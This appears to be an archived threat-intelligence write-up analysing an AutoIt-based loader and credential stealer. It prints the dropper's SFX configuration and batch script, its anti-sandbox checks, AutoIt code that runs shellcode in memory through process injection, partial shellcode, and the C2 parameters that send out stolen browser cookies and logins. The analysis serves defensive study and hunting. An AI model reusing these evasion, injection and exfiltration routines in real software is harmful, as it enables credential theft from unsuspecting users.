{
	"id": "4269a99a-cf46-47db-a76c-c9a3cc8eca3c",
	"created_at": "2026-04-06T00:07:55.322369Z",
	"updated_at": "2026-04-10T03:21:16.965037Z",
	"deleted_at": null,
	"sha1_hash": "0a1a3c85e85c093eda159ff17b7f40e6aee999a6",
	"title": "CyberThreatIntel/Additional Analysis/UnknownTA/2020-09-07/Analysis.md at master · StrangerealIntel/CyberThreatIntel",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 970714,
	"plain_text": "CyberThreatIntel/Additional Analysis/UnknownTA/2020-09-07/Analysis.md at master · StrangerealIntel/CyberThreatIntel\r\nBy StrangerealIntel\r\nArchived: 2026-04-05 20:12:51 UTC\r\nTime to take the bull by the horns\r\nMalware analysis\r\nTTPs\r\nHunting\r\nCyber kill chain\r\nIndicators Of Compromise (IOC)\r\nReferences MITRE ATT\u0026CK Matrix\r\nLinks\r\nOriginal Tweet\r\nReferences\r\nMalware-analysis\r\nThe initial vector is a self-extracting archive (SFX). It is built from an alternative SFX module project: 7z sfx\r\nModified Module (7zsfx).\r\nSFX module - Copyright (c) 2005-2016 Oleg Scherbakov\r\n1.7.0 develop [x86] build 3900 (April 1, 2016)\r\n7-Zip archiver - Copyright (c) 1999-2015 Igor Pavlov\r\n15.14 (December 31, 2015)\r\nThis launches a shell instance to extract the objects.\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 1 of 31\n\nLike the 7-Zip module, it uses an internal configuration for the actions to execute once the extraction\r\nof the objects is done. 
It uses the hide options to run in the background and does not overwrite files that\r\nalready exist.\r\n;!@Install@!UTF-8!\r\n// control flag chains\r\nMiscFlags=\"1+2+16+64+128\"\r\n// 2 - hides the extraction dialog completely (silent mode)\r\nGUIMode=\"2\"\r\n// 1 - do not overwrite the existing files\r\nOverwriteMode=\"1\"\r\n// hidcon: -\u003e hide window to user\r\nRunProgram=\"hidcon:cmd /c echo SLsZudZK\"\r\nRunProgram=\"hidcon:cmd /c cmd \u003c sVqHm.com\"\r\n;!@InstallEnd@!Rar!\r\nFor the MiscFlags value, the project's Russian-language archive documents that the flags can be chained to stack\r\nthe actions and to automate the error handling and check actions.\r\nThis launches the main script, which initiates the rest of the chain of actions.\r\nThe first part of the script uses a lot of kill switches already detected in July 2020 in similar AutoIt scripts.\r\naaa_TouchMeNot refers to a file used by the MSE sandbox for threat analysis; it was first\r\npresented at Black Hat 2018 and first used by the BitPaymer ransomware.\r\nSet YAFtyhpbN=Q\r\nREM Check sandbox MSE\r\nif exist C:\\aaa_TouchMeNot_.txt exit\r\nREM Killswitch Computername\r\nif %computername% == DESKTOP-%YAFtyhpbN%UO5%YAFtyhpbN%U33 exit\r\nREM DESKTOP-QO5QU33\r\nping -n 1 UKL.UVLJR\r\nif %errorlevel% == 0 exit\r\nif %computername% == NfZtFbPfH exit\r\nif %computername% == ELICZ exit\r\nif %computername% == MAIN 
exit\r\nThe final part of the script fixes the header of the AutoIt builder\r\n(23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928), writes it to disk, decodes the\r\nbase64 AutoIt payload to execute and launches it with the AutoIt builder.\r\nREM Fix header on the autoit builder\r\n\u003cnul set /p =\"MZ\" \u003e SearchIndexer.com\r\nREM Echo and write the PE\r\ntype pZFFZxnbbPw.com \u003e\u003e SearchIndexer.com\r\nREM Remove the last script\r\ndel pZFFZxnbbPw.com\r\nREM Decode from base 64 the autoit payload to execute\r\ncertutil -decode sUs.com h\r\nREM Execute it\r\nSearchIndexer.com h\r\nping 127.0.0.1 -n 30\r\nAs obfuscation, the script uses many While/Switch loops that redirect execution to the right section of code in\r\neach function. The first thing to keep in mind is to check which functions are actually used by counting the\r\nreferences to each function. As forensics and malware analysis are partly a matter of instinct, this is a good\r\nstart: only four of the twelve functions are used; the rest is junk code that raises the entropy and makes the\r\nanalysis harder. 
So only a third of the more than 16,000 lines of the script needs to be deobfuscated, which is a better start.\r\nIf (Ping(NuEIwMq(\"74I89I100I112I77I120I109I110I74I97I97I100I119I46I74I89I100I112I77I120I109I110I74I97\r\n \r\n$qGRwbSPeJ = @AppDataDir \u0026 NuEIwMq(\"94I101I113I119I117I110I94I101I113I119I117I110I48I101I113I111\",2)\r\n$ArlTLV = @AppDataDir \u0026 NuEIwMq(\"99I106I118I124I122I115I99I72I93I117I112I127I94I78\",7)\r\n$RvZgoJpth = @AppDataDir \u0026 NuEIwMq(\"98I105I117I123I121I114I98I123I88I116I124I77I124I123I72I124I80I107\r\n$aCYDDEjBZszBdg = @AppDataDir \u0026 NuEIwMq(\"101I108I120I126I124I117I101I90I79I111I82I77I127I82I89I125I93\r\nIf Not FileExists($qGRwbSPeJ) Then\r\nIf DirGetSize(@AppDataDir \u0026 NuEIwMq(\"96I103I115I121I119I112\",4)) \u003c 0 Then\r\nGlobal $JAYmBXZG = 118\r\nGlobal $hnwsOohw = 96\r\nWhile (6350-6349)\r\nSwitch $JAYmBXZG\r\nCase 115\r\n$dlffyVxJSrHGTz = SplashOff()\r\n$102 = 138\r\nWhile $RxnOkVaHWvSKlBaAlOllMJswgWDFYJifUGyFKAYzXDzShlpomD \u003e $102\r\n$dlffyVxJSrHGTz \u0026= ClipGet()\r\nWEnd\r\n$RhpdnNrMcyxjdGLYXChqJwlUuEKxGMMN = 5535\r\n$JAYmBXZG = $JAYmBXZG + 1\r\nCase 116\r\n$REJvBWHgZYXtFnk = IsAdmin()\r\n$88 = 86\r\nWhile $JuQegpUrJuJzHmfPQmuXDEoyDGiGNfwhBktUwSlHKGMxjgHmIigy \u003e $88\r\n$REJvBWHgZYXtFnk \u0026= Exp(279)\r\nWEnd\r\n$cccOYfnhXSNSgZHXFqVVhhZVdaCFvfsfQ = IsDllStruct(136518)\r\n$JAYmBXZG = $JAYmBXZG + 1\r\nCase 117\r\nOnce the switch conditions are removed to recover the code, a second layer of obfuscation appears: the strings\r\nare passed to the NuEIwMq function to be deobfuscated. 
The algorithm is offset-based: each integer value, minus the offset, is\r\nconverted to its corresponding ASCII character.\r\nFunc NuEIwMq($a, $b)\r\n $str = ''\r\n $tab = StringSplit($a, \"I\", 2)\r\n For $i = 0 To UBound($tab) - 1\r\n $str \u0026= ChrW($tab[$i] - $b)\r\n Next\r\n Return $str\r\nEndFunc\r\nIt splits the string into an array and applies the offset to each element while reading the whole array to obtain the final string. The\r\nAutoIt code above can easily be converted to PowerShell to decode the strings.\r\nfunction Decode\r\n{\r\n param (\r\n [string]$a,\r\n [int]$b\r\n )\r\n $str = ''\r\n $tab = $a.Split(\"I\")\r\n for ($i = 0; $i -lt $tab.Count; $i++) { $str += [char][int]($tab[$i] - $b) }\r\n return $str\r\n}\r\n\u003e Decode \"94I101I113I119I117I110I94I101I113I119I117I110I48I101I113I111\" 2\r\n\\cousl\\cousl.com\r\nAs a first action, the script checks whether it is running in a sandbox, using the well-known method based on the difference\r\nbetween the real elapsed time and the requested sleep time, measured with GetTickCount.\r\nOpt(\"TrayIconHide\", 1)\r\nFunc Antisandbox_by_diff_time($val)\r\n$time1 = DllCall (\"kernel32.dll\", \"long\", \"GetTickCount\")\r\n$uFQgPxoxA = DllCall(\"kernel32.dll\", \"DWORD\", \"Sleep\", \"dword\", $val)\r\n$time2 = DllCall (\"kernel32.dll\", \"long\", \"GetTickCount\")\r\n$dif_time = $time2[0] - $time1[0]\r\nIf Not (($dif_time+500)\u003e=$val and ($dif_time-500)\u003c=$val) Then\r\nExit\r\nEndIf\r\nEndFunc\r\nA second wave of anti-analysis measures reuses the MSE sandbox flag, the kill-switch domain\r\nand various computer names.\r\nIf (FileExists(\"C:\\aaa_TouchMeNot.txt\" Or @ComputerName = \"NfZtFbPfH\" Or @ComputerName = \"tz\" Or @Com\r\nBy hunting, we can note that the AutoIt 
payloads still have the same computer names and check the MSE flag\r\nbut use different delimiters for the obfuscation method. The structures are the same and rely on the unused\r\njunk functions described above.\r\nDate Delimiter Computernames Check MSE flag ?\r\n2020-09-03 I NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-09-02 M NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-08-31 . NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-08-01 M NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-31 M NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-27 e NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-27 e NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-22 ± NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-17 , NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-16 , NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-15 e NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-15 e NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-14 . 
NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-13 , NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\n2020-07-09 * NfZtFbPfH, tz, ELICZ, MAIN, DESKTOP-QO5QU33 Yes\r\nThe next block of code creates the semaphore, creates the shortcuts, prepares the files and paths\r\nand runs the final payload in memory, applying the anti-sandbox measures to avoid launching it in an\r\nanalysis environment.\r\n$Jvar = DllCall(DllOpen(\"kernel32.dll\"), \"handle\", \"CreateSemaphoreA\", \"ptr\", Null, \"long\", 1, \"long\r\n$CodeError = DllCall(\"kernel32.dll\", \"long\", \"GetLastError\")[0]\r\nIf $CodeError == 183 Then\r\n$Pfile = FileOpen(@ScriptDir \u0026 '\\' \u0026 'QFfIDvIPtTOu.com',16)\r\n$RData = FileRead($Pfile)\r\nIf (Ping(\"JYdpMxmnJaadw.JYdpMxmnJaadw\", 1000) \u003c\u003e 0) Then Exit\r\n$PathDomain = @AppDataDir \u0026 \"\\cousl\\cousl.com\"\r\n$PathAutoitScript = @AppDataDir \u0026 \"\\cousl\\AVnixWG\"\r\n$PathVBSFile = @AppDataDir \u0026 \"\\cousl\\uRnvGvuBvJe.vbs\"\r\n$PathBinaryData = @AppDataDir \u0026 \"\\cousl\\QFfIDvIPtTOu.com\"\r\nIf Not FileExists($PathDomain) Then\r\nIf DirGetSize(@AppDataDir \u0026 \"\\cousl\") \u003c 0 Then\r\nDirCreate(@AppDataDir \u0026 \"\\cousl\")\r\nEndIf\r\nFileWrite(FileOpen($PathAutoitScript,2), FileRead(@ScriptFullPath))\r\nFileDelete(@ScriptFullPath)\r\nFileWrite(FileOpen($PathDomain,2), FileRead(FileOpen(@AutoItExe,16)))\r\nFileWrite(FileOpen($PathBinaryData,2), FileRead(FileOpen(\"SHhKFxKRvVQw0eqo\",16)))\r\nFileDelete(\"SHhKFxKRvVQw0eqo\")\r\nFileWrite(FileOpen($PathVBSFile,2), \"pUCkyGzHUI = GetObject(\" \u0026 ChrW(34) \u0026 \"winmgmts:\\\\.\\root\r\nFileSetAttrib(@AppDataDir \u0026 \"\\cousl\", \"+SH\", 1)\r\nIf Not FileExists(@StartupDir \u0026 \"\\cousl.url\") Then\r\nFileWrite(FileOpen(@StartupDir \u0026 \"\\cousl.url\",34), \"[InternetShortcut]\" 
\u0026 @CRLF \u0026 \"UR\r\nElse\r\nFileDelete(@StartupDir \u0026 \"\\cousl.url\")\r\nFileWrite(FileOpen(@StartupDir \u0026 \"\\cousl.url\",34), \"[InternetShortcut]\" \u0026 @CRLF \u0026 \"UR\r\nEndIf\r\nEndIf\r\n$time2Num = 0\r\nAntisandbox_by_diff_time(8391)\r\nFor $j = 0 To 29984739\r\n$time2Num = $time2Num + 1\r\nNext\r\nIf Not ($time2Num == 29984740) Then Exit\r\n$Path_PE = @SystemDir \u0026 \"\\\" \u0026 \"nslookup.exe\"\r\nGlobal $Jvar = AllocatePayload(Init_Struct(Binary($RData), Binary(\"7914561\")), $ArgCmdline, $Path_PE\r\nWinWaitClose(1)\r\nElse\r\nRun(@AutoItExe \u0026 \" \" \u0026 $CmdLineRaw)\r\nAntisandbox_by_diff_time(500)\r\nThe next two functions initialise the process and the structure that holds the payload. Depending on\r\nthe OS architecture, it loads the following structure header for the process to initiate.\r\nFunc Init_Struct($arg1, $arg2)\r\nIf @AutoItX64 Then\r\nLocal $OP_DLL_Struct = \"0x89C055 [...] EC54963F241\"\r\n$OP_DLL_Struct \u0026= \"83C201EBC448 [...] 5EC3\"\r\nElse\r\nLocal $OP_DLL_Struct = \"0x89C05531C057565383E [...] 583C4085B5E5F5DC2100089\"\r\n$OP_DLL_Struct \u0026= \"DB5557565383EC088B54 [...] 21000\"\r\nEndIf\r\nLocal $Ref_Struct_1 = (StringInStr($OP_DLL_Struct, \"89C0\") - 3) / 2\r\nLocal $Ref_Struct_2 = (StringInStr($OP_DLL_Struct, \"89DB\") - 3) / 2\r\n$OP_DLL_Struct = Binary($OP_DLL_Struct)\r\n$struct1 = DllStructCreate(\"byte[\" \u0026 BinaryLen($OP_DLL_Struct) \u0026 \"]\", DllCall(\"kernel\r\nDllStructSetData($struct1, 1, $OP_DLL_Struct)\r\nLocal $lim = BinaryLen($arg2)\r\nLocal $Bytes_Struct = DllStructCreate(\"byte[\" \u0026 $lim \u0026 \"]\")\r\nDllStructSetData($Bytes_Struct, 1, $arg2)\r\nLocal $ctvBJcdIjHzL = DllStructCreate(\"byte[272]\")\r\n@AutoItX64 ? 
DllCallAddress(\"none\", DllStructGetPtr($struct1) + $Ref_Struct_1, \"ptr\"\r\nLocal $lim2 = BinaryLen($arg1)\r\nLocal $Bytes_Struct2 = DllStructCreate(\"byte[\" \u0026 $lim2 \u0026 \"]\")\r\nDllStructSetData($Bytes_Struct2, 1, $arg1)\r\n@AutoItX64 ? DllCallAddress(\"int\", DllStructGetPtr($struct1) + $Ref_Struct_2,\"ptr\", D\r\nReturn Init_process($Bytes_Struct2, 1)\r\nEndFunc\r\nFunc Init_process($Ref_Struct, $Ref_Element, $control = 0 )\r\nIf NOT $control = 0 Then\r\nreturn DllStructGetData($Ref_Struct, $Ref_Element, $control)\r\nelse\r\nreturn DllStructGetData($Ref_Struct, $Ref_Element)\r\nEndIF\r\nEndFunc\r\nThe last function called allocates the payload in memory and creates the structure needed to run\r\nit. The actor uses StringTrimLeft(Binary(Chr(Random(65, 90, 1))),2) as obfuscation at the end of the\r\npayload: it picks a random letter between A and Z, but the result stays the same because the letter is converted to binary\r\n(01000001 - 01011010) and only the two leftmost digits are kept, which always gives \"01\". It can therefore be\r\nreplaced by that value (\"01\") to get the whole shellcode that needs to run.\r\nFunc AllocatePayload($a, $SJKRKKK = \"\", $cOVkTS = \"\")\r\n$Payload = \"0xE9971E000 [...] 45F48A00\"\r\n[...]\r\n$Payload \u0026= \"300400008DB424B001000050F3A5E8F8E2FFFF6A5E596A\" \u0026 StringTrimLeft(Binary(Chr(Rand\r\n$Payload \u0026= \"3CF3A56689442410586A\" \u0026 StringTrimLeft(Binary(Chr(Random(65, 90, 1))),2) \u0026 \"6689\r\n$Payload \u0026= \"586A\" \u0026 StringTrimLeft(Binary(Chr(Random(65, 90, 1))),2) \u0026 \"6689442418586A\" \u0026 St\r\n$Payload \u0026= \"586A\" \u0026 StringTrimLeft(Binary(Chr(Random(65, 90, 1))),2) \u0026 \"6689442420586A\" \u0026 St\r\n$Payload \u0026= \"6689442428586A\" \u0026 StringTrimLeft(Binary(Chr(Random(65, 90, 1))),2) \u0026 \"668944242A\r\n$Payload \u0026= \"6689442430586A\" \u0026 StringTrimLeft(Binary(Chr(Random(65, 90, 1))),2) \u0026 \"6689442432\r\n$Payload \u0026= \"33C066894424368D4 [...] 
750C8D84\"\r\n$Payload \u0026= \"242C0300008DB424B40 [...] 0000000\"\r\n$Payload \u0026= \"0000000000000000000000000000000000000000000000000000000000000000\"\r\n$Bin_Payload = Binary($Payload)\r\n$Bin_Data = Binary($a)\r\n$lim_Payload = BinaryLen($Bin_Payload)\r\n$initAlloc = DllCall(\"kernel32.dll\", \"ptr\", \"VirtualAlloc\", \"ptr\", 0, \"ulong_ptr\", $lim_Paylo\r\n$struc = DllStructCreate(\"byte file[\" \u0026 BinaryLen($Bin_Data) \u0026 \"]\")\r\nDllStructSetData(DllStructCreate(\"byte nop[\" \u0026 $lim_Payload \u0026 \"]\", $initAlloc), \"nop\", $Bin_P\r\nDllStructSetData($struc, \"file\", $Bin_Data)\r\n$address = DllCallAddress(\"dword\", $initAlloc, \"str\", $cOVkTS, \"ptr\", DllStructGetPtr($struc\r\nReturn WinGetProcess($address)\r\nEndFunc\r\nThe extracted shellcode can easily be loaded into Radare2 through a malloc:// file, or into Cutter (the Radare2 GUI) through the\r\nshellcode panel.\r\n$ r2 malloc://1\r\n[0x00000000]\u003e wx E9971E0000558BECB84D5A000083EC14663903740433C0EB7F8B433C813C185045000075 [...]\r\nAs a first action, the shellcode loads its strings as stack strings in memory. By unstacking the strings, we get a\r\nfirst look at the actions the shellcode performs. The attacker uses NtQuerySystemInformation to\r\nget a list of all handles open on the system in order to perform KnownDlls cache poisoning. By comparing each\r\nreference with \\KnownDlls\\X, it obtains the HandleValue returned by the call. 
This allows it to perform an\r\ninjection into the target process.\r\n0x000001fb mov word [rbp - 0x320], 0x57 ; 'FindResourceW'\r\n0x00000222 mov byte [rbp - 0x218], al ; 'LoadResource'\r\n0x0000024f mov byte [rbp - 0x33e], al ; 'SizeofResource'\r\n0x00000273 mov byte [rbp - 0x270], al ; 'LockResource'\r\n0x000002b5 mov byte [rbp - 0x670], al ; 'NtQuerySystemInformation'\r\n0x000002ed mov dword [rbp - 0x658], 0x79726f ; 'NtAllocateVirtualMemory'\r\n0x00000315 mov word [rbp - 0x2d0], 0x73 ; 'NtOpenProcess'\r\n0x0000035a mov word [rbp - 0x6c4], 0x73 ; 'NtQueryInformationProcess'\r\n0x00000381 mov word [rbp - 0x2f0], 0x6f ; 'GetSystemInfo'\r\n0x00000398 mov byte [rbp - 0x2c], al ; 'mbstowcs'\r\n0x000003a8 mov byte [rbp - 0x22], al ; 'strlen'\r\n0x000003e6 mov byte [rbp - 0x19e], al ; '\\KnownDlls32\\ntdll.dll'\r\n0x00000428 mov word [rbp - 0x238], 0x6c ; '\\KnownDlls32\\advapi32.dll'\r\n0x0000046d mov word [rbp - 0x254], 0x6c ; '\\KnownDlls32\\kernel32.dll'\r\n0x000004a8 mov dword [rbp - 0x1dc], 0x6c6c64 ; '\\KnownDlls32\\user32.dll'\r\n0x000004e4 mov byte [rbp - 0x110], al ; '\\KnownDlls\\ntdll.dll'\r\n0x0000051c mov dword [rbp - 0x200], 0x6c6c64 ; '\\KnownDlls\\advapi32.dll'\r\n0x00000558 mov dword [rbp - 0x1c4], 0x6c6c64 ; '\\KnownDlls\\kernel32.dll'\r\n0x00000594 mov word [rbp - fcn.00000164], 0x6c ; '\\KnownDlls\\user32.dll'\r\n0x000005cf mov byte [rbp - 0xf8], al ; '\\KnownDlls\\Ole32.dll'\r\n0x000005e9 mov byte [rbp - 0x16], al ; 'user32.dll'\r\n0x000005ec mov dword [rbp - 0xf4], 0x704f744e ; 'NtOpenKey'\r\n0x00000627 mov dword [rbp - 0x410], 0x79654b ; 'NtQueryValueKey'\r\n0x00000658 mov byte [rbp - 0x39e], al ; 'NtEnumerateKey'\r\n0x0000066b mov byte [rbp - 0x76], al ; 'memcpy'\r\n0x000006a0 mov byte [rbp - 0x5c8], al ; 'CryptAcquireContextW'\r\n0x000006a6 mov dword [rbp - 0x42c], 0x70797243 ; 'CryptCreateHash'\r\n0x000006ce mov dword [rbp - 0x30c], 0x70797243 ; 'CryptHashData'\r\n0x0000071c mov byte [rbp - 0x35e], al ; 'CryptDeriveKey'\r\n0x00000722 mov 
dword [rbp - 0x478], 0x70797243\r\n0x0000074a mov byte [rbp - 0x468], al ; 'CryptDestroyHash'\r\n0x00000750 mov dword [rbp - 0x2ac], 0x70797243\r\n0x0000076e mov byte [rbp - 0x2a0], al ; 'CryptDecrypt'\r\n0x00000774 mov dword [rbp - 0x3ec], 0x70797243 ; 'CryptDestroyKey'\r\n0x000007c4 mov dword [rbp - 0x56c], 0x747865 ; 'CryptReleaseContext'\r\n0x000007f6 mov dword [rbp - 0x558], 0x79726f ; 'NtReadVirtualMemory'\r\n0x00000815 mov byte [var_48h], al ; 'LoadLibraryA'\r\n0x0000083f mov byte [rbp - 0x96], al ; 'GetProcAddress'\r\n0x0000085a mov byte [rbp - 8], al ; 'advapi32.dll'\r\n0x00000871 mov byte [rbp - 0xc8], al ; 'lstrlenW'\r\n0x000008b2 mov byte [rbp - 0x626], al ; 'NtProtectVirtualMemory'\r\n0x000008d6 mov byte [rbp - 0x228], al ; 'FreeResource'\r\n0x00000903 mov byte [rbp - 0x36e], al ; 'CreateProcessW'\r\n0x00000927 mov word [rbp - 0x2e0], 0x79 ; 'RtlZeroMemory'\r\n0x00000961 mov byte [rbp - 0x4b6], al ; 'NtTerminateProcess'\r\n0x00000999 mov byte [rbp - 0x5b0], al ; 'NtWriteVirtualMemory'\r\n0x000009d1 mov byte [rbp - 0x598], al ; 'ZwUnmapViewOfSection'\r\n0x000009fe mov byte [rbp - 0x37e], al ; 'NtResumeThread'\r\n0x00000a35 mov byte [rbp - 0x4ca], al ; 'NtSetContextThread'\r\n0x00000a6c mov byte [rbp - 0x4f2], al ; 'NtGetContextThread'\r\n0x00000aa3 mov byte [rbp - 0x48e], al ; 'NtMapViewOfSection'\r\n0x00000ad1 mov dword [rbp - 0x6c0], 0x61707845 ; 'NtCreateSection'\r\n0x00000b0d mov word [rbp - 0x6a8], 0x57 ; 'ExpandEnvironmentStringsW'\r\n0x00000b47 mov byte [rbp - 0x4de], al ; 'GetModuleFileNameA'\r\n0x00000b88 mov byte [rbp - 0x60e], al ; 'NtQueryInformationFile'\r\n0x00000bab mov byte [rbp - 0x156], al ; 'NtReadFile'\r\n0x00000bce mov byte [rbp - 0x126], al ; 'NtOpenFile'\r\n0x00000bf2 mov word [rbp - 0x2c0], 0x79 ; 'NtSetValueKey'\r\n0x00000c19 mov byte [rbp - 0x290], al ; 'NtCreateFile'\r\n0x00000c33 mov dword 
[rbp - 0x1f4], 0x656c69 ; 'NtWriteFile'\r\n0x00000c79 mov dword [rbp - 0x6fc], 0x687461 ; 'RtlFormatCurrentUserKeyPath'\r\n0x00000c90 mov byte [rbp - 0x6e], al ; 'wcscat'\r\n0x00000ca3 mov byte [rbp - 0x7e], al ; 'memset'\r\n0x00000cce mov byte [rbp - 0x440], al ; 'NtDelayExecution'\r\n0x00000ce7 mov byte [rbp - 0x8e], al ; 'wcslen'\r\n0x00000d15 mov byte [rbp - 0x454], al ; 'NtCreateThreadEx'\r\n0x00000d38 mov byte [rbp - 0x17a], al ; 'NtContinue'\r\n0x00000d66 mov dword [rbp - 0x544], 0x646165 ; 'RtlCreateUserThread'\r\n0x00000da1 mov byte [rbp - 0x4a2], al ; 'NtOpenProcessToken'\r\n0x00000dd9 mov dword [rbp - 0x640], 0x6e656b ; 'NtAdjustPrivilegesToken'\r\n0x00000e28 mov byte [rbp - 0x6de], al ; 'RtlCreateProcessParameters'\r\n0x00000e60 mov byte [rbp - 0x580], al ; 'RtlCreateUserProcess'\r\n0x00000e66 mov dword [rbp - 0x52c], 0x7243775a\r\n0x00000e8e mov dword [rbp - 0x51c], 0x6e6f69 ; 'ZwCreateTransaction'\r\n0x00000eb6 mov word [rbp - 0x310], 0x6e ; 'NtOpenSection'\r\n0x00000efb mov byte [rbp - 0x68c], al ; 'RtlSetCurrentTransaction'\r\n0x00000f33 mov word [rbp - 0x5e0], 0x6e ; 'ZwRollbackTransaction'\r\n0x00000f77 mov byte [rbp - 0x5f6], al ; 'LdrGetProcedureAddress'\r\n0x00000f9a mov byte [rbp - 0x14a], al ; 'LdrLoadDll'\r\n0x00000fb3 mov byte [rbp - 0x86], al ; 'wcscmp'\r\n0x00000fcd mov dword [rbp - 0x1b8], 0x41786f ; 'MessageBoxA'\r\n0x00000ffe mov byte [rbp - 0x34e], al ; 'IsWow64Process'\r\n0x0000102c mov dword [rbp - 0x530], 0x79726f ; 'NtFreeVirtualMemory'\r\n0x00001040 mov dword [rbp - 0xa8], 0x65736f ; 'NtClose'\r\n0x00001057 mov byte [rbp - 0x66], al ; 'wcscpy'\r\n0x00001082 mov dword [rbp - 0x508], 0x737365 ; 'NtCreateUserProcess'\r\n0x000010a0 mov byte [rbp - 0xb0], al ; 'wcstombs'\r\n0x000010cd mov byte [rbp - 0x32e], al ; 'NtQuerySection'\r\n0x000010f0 mov byte [rbp - 0x13e], al ; 
'ShowWindow'\r\n0x00001114 mov dword [rbp - 0x430], 0x577845 ; 'CreateWindowExW'\r\n0x00001145 mov byte [rbp - 0x38e], al ; 'RegisterClassW'\r\n0x00001172 mov byte [rbp - 0x3ae], al ; 'DefWindowProcW'\r\n0x00001178 mov dword [rbp - 0x40c], 0x74736f50 ; 'Post'\r\n0x00001182 mov dword [rbp - 0x408], 0x74697551 ; 'Quit'\r\n0x00001196 mov dword [rbp - 0x400], 0x656761 ; 'Message'\r\n0x000011b4 mov byte [rbp - 0xd4], al ; 'EndPaint'\r\n0x000011ce mov byte [rbp - 0xbc], al ; 'FillRect'\r\n0x000011f1 mov byte [rbp - 0x132], al ; 'BeginPaint'\r\n0x0000121e mov byte [rbp - 0x3ce], al ; 'CoInitializeEx'\r\n0x0000124c mov byte [rbp - 0x47c], al ; 'CoCreateInstance'\r\n0x000012d7 mov byte [rbp - 0x3be], al ; 'NtCreateMutant'\r\n0x000012fb mov byte [rbp - 0x2b0], al ; 'NtOpenMutant'\r\n0x00001360 mov dword [rbp - 0x284], 0x57786574 ; 'CreateMutexW'\r\nAlong the way, it rebuilds the sections and the DLL to inject into the process.\r\nOn dynamic analysis, we can see the actions used to steal the credentials: it downloads and executes the\r\nsame sqlite3 package (76ec7536ebeaa661263f677f89222bb5ac68c16087d3e99a66cba6419d34b57f) that has\r\nbeen used by some samples since last month. 
It writes the data extracted with sqlite3.dll to the\r\ncorresponding file and compresses it into a zip in memory.\r\nUnfortunately the C2 did not respond, but the agent sends the information and the role of some parameters\r\ncan be assigned.\r\n// first post :\r\np1=90059c37-1320-41a4-b58d-816d-806e6f6e6976\u0026p2=55534552\u0026p3=61646D696E\u0026p4=57696E646F7773203720536572766963652050\r\n // Second post :\r\n p1=90059c37-1320-41a4-b58d-816d-806e6f6e6976\u0026p2=55534552\u0026p3=61646D696E\u0026p4=57696E646F777320372053657276696365205\r\nParameter | Description | Example from Anyrun | Example from Anyrun (decoded)\r\np1 | GUID Client | 90059c37-1320-41a4-b58d-816d-806e6f6e6976 | 90059c37-1320-41a4-b58d-816d-806e6f6e6976\r\np2 | Computername | 55534552 | USER\r\np3 | Username | 61646D696E | admin\r\np4 | System Information | 57696E646F7773 ... 974696F6E29 | Windows 7 Service Pack 1 (Version 6.1, Build 7601, 32-bit Edition)\r\np5 | kept for a new feature ? | |\r\np8 | Response (DATA / OK / Response command) | 504B0304140000080800 ... / 4F4B / Response command | ZIP DATA / OK / Response command\r\nThis time the data are only pushed to the C2 as a hex string instead of being XORed, and the response from the C2 has a different\r\nstructure than in the sample of June 2020.\r\nAs the zip has no password, it can easily be unzipped to get the content. 
Anyrun only has\r\nbrowser honeypot data, but the stealer also steals other current credentials (wallets, configurations ...).\r\n90059c37-1320-41a4-b58d-816d-806e6f6e6976 // By GUID client\r\n | information.txt // system info\r\n |\r\n +---cookies\r\n | cookies_Chrome\r\n | cookies_Chrome.txt\r\n | cookies_Firefox.txt\r\n |\r\n +---forms\r\n | forms_Chrome\r\n | forms_Chrome.txt\r\n | forms_Firefox.txt\r\n |\r\n \\---users\r\n users_Chrome.txt\r\n users_Firefox.txt\r\nThis sample seems to differ from the Taurus loader, which uses the same loader but three different\r\nfiles to be launched in memory. Hunting this loader in the past has shown that different\r\nstealers and RATs use this same loader.\r\nTTPs\r\nThe global TTPs used by this loader can be summarised in this process graph (some samples have differences\r\nlike DOS obfuscation) :\r\nHunting\r\nFirstly, we observed that this seems to use the same AutoIt builder to run the AutoIt script. Pivoting on its\r\nhash, we can note two groups in the results. The first group is used in malicious MSI files to run an AutoIt script\r\nwith the builder only as a fake installer (early June). These do not have the same TTPs as this loader. The\r\nsecond group has exactly the same TTPs with just some additional obfuscation methods (early\r\nJuly).\r\nBy comparing each case, we notice that the structure is the same with some differences, and we can examine\r\neach part of the code.\r\nDOS script\r\nMost of the time the script is not obfuscated; the rare cases use a common DOS obfuscation by substring\r\nextraction from an alphabet string to build the final code. 
